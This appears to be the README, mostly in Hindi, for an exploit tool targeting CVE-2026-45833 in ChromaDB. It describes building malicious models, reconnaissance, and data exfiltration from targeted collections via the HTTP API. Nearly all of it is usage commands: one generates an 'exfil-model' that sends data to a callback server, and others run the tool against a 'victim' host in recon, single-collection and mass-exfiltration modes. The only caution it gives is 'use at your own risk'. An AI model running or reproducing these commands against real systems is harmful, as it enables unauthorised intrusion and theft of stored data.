
CVE-2026-45833 के लिए ChromaDB में शोषण उपकरण, जो HTTP API के माध्यम से दुर्भावनापूर्ण मॉडल निर्माण, टोही, और लक्षित संग्रहों से डेटा बहिष्करण को सक्षम बनाता है।
CVE-2026-45833 ChromaDB अपने जोखिम पर प्रयोग करें कुछ कोड में संशोधन की आवश्यकता है।
python3 -c " from main import MaliciousModelGenerator gen = MaliciousModelGenerator() gen.generate_model('exfil-model', 'exfil_env', { 'exfil_url': 'http://your-server.com/callback' }) "
python3 main.py --target http://victim:8000
--token "eyJ..."
--action recon
python3 main.py --target http://victim:8000
--token "eyJ..."
--collection "coll-id-here"
--model "your-username/exfil-model"
python3 main.py --target http://victim:8000
--token "eyJ..."
--action mass
--model "your-username/exfil-model"